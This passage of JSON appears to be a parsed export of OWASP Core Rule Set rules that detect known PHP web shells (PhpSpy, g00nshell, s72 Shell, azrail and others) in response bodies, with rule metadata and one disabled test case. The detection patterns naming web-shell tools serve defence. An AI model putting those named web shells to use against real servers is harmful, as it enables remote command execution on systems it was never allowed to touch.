[ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 314, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^PHP Web Shell\\r\\n\\r\\n\\r\\n ", "actions": [ { "act_name": "id", "lineno": 315, "act_quote": "no_quote", "act_arg": "955240", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 316, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 317, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 318, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 319, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 320, "act_quote": "quotes", "act_arg": "Unknown web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 321, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 322, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 323, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 324, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 325, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 326, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 327, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 328, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 329, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 330, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 331, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 314 } }, { "rule_id": "955250", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^\\n\\n
Input command :
\\n
", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Unknown web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 334, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^\\n\\n
Input command :
\\n", "actions": [ { "act_name": "id", "lineno": 335, "act_quote": "no_quote", "act_arg": "955250", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 336, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 337, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 338, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 339, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 340, "act_quote": "quotes", "act_arg": "Unknown web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 341, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 342, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 343, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 344, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 345, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 346, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 347, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 348, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 349, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 350, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 351, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 334 } }, { "rule_id": "955260", "has_tests": true, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^\\n\\nRu24PostWebShell ", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "Ru24PostWebShell web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [ { "description": "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled.", "test_id": 1, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "text/plain" }, "data": "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" }, "expected": { "should_block": true, "rule_ids": [ 955260 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 356, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^<html>\\n<head>\\n<title>Ru24PostWebShell ", "actions": [ { "act_name": "id", "lineno": 357, "act_quote": "no_quote", "act_arg": "955260", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 358, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 359, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 360, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 361, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 362, "act_quote": "quotes", "act_arg": "Ru24PostWebShell web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 363, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 364, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 365, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 366, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 367, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 368, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 369, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 370, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 371, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 372, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 373, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 356 } }, { "rule_id": "955270", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "<title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "s72 Shell web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 376, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "s72 Shell v[0-9.]+ Codinf by Cr@zy_King", "actions": [ { "act_name": "id", "lineno": 377, "act_quote": "no_quote", "act_arg": "955270", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 378, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 379, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 380, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 381, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 382, "act_quote": "quotes", "act_arg": "s72 Shell web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 383, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 384, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 385, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 386, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 387, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 388, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 389, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 390, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 391, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 392, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 393, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 376 } }, { "rule_id": "955280", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^\\r\\n\\r\\n\\r\\nPhpSpy Ver [0-9]+", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "PhpSpy web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 396, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^\\r\\n\\r\\n\\r\\nPhpSpy Ver [0-9]+", "actions": [ { "act_name": "id", "lineno": 397, "act_quote": "no_quote", "act_arg": "955280", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 398, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 399, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 400, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 401, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 402, "act_quote": "quotes", "act_arg": "PhpSpy web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 403, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 404, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 405, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 406, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 407, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 408, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 409, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 410, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 411, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 412, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 413, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 396 } }, { "rule_id": "955290", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^ \\n\\n\\n\\ng00nshell v[0-9.]+ ", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "g00nshell web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 416, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^ <html>\\n\\n<head>\\n\\n<title>g00nshell v[0-9.]+ ", "actions": [ { "act_name": "id", "lineno": 417, "act_quote": "no_quote", "act_arg": "955290", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 418, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 419, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 420, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 421, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 422, "act_quote": "quotes", "act_arg": "g00nshell web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 423, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 424, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 425, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 426, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 427, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 428, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 429, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 430, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 431, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 432, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 433, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 416 } }, { "rule_id": "955300", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@contains", "argument": "<title>punkholicshell", "negated": false } }, "transformations": [ "none", "removeWhitespace", "lowercase" ], "metadata": { "phase": "4", "message": "PuNkHoLic shell web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 438, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@contains", "operator_argument": "punkholicshell", "actions": [ { "act_name": "id", "lineno": 439, "act_quote": "no_quote", "act_arg": "955300", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 440, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 441, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 442, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 443, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 443, "act_quote": "no_quote", "act_arg": "removeWhitespace", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 443, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 444, "act_quote": "quotes", "act_arg": "PuNkHoLic shell web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 445, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 446, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 447, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 448, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 449, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 450, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 451, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 452, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 453, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 454, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 455, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 438 } }, { "rule_id": "955310", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^\\n \\n azrail [0-9.]+ by C-W-M", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "azrail web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 458, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^\\n \\n azrail [0-9.]+ by C-W-M", "actions": [ { "act_name": "id", "lineno": 459, "act_quote": "no_quote", "act_arg": "955310", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 460, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 461, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 462, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 463, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 464, "act_quote": "quotes", "act_arg": "azrail web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 465, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 466, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", 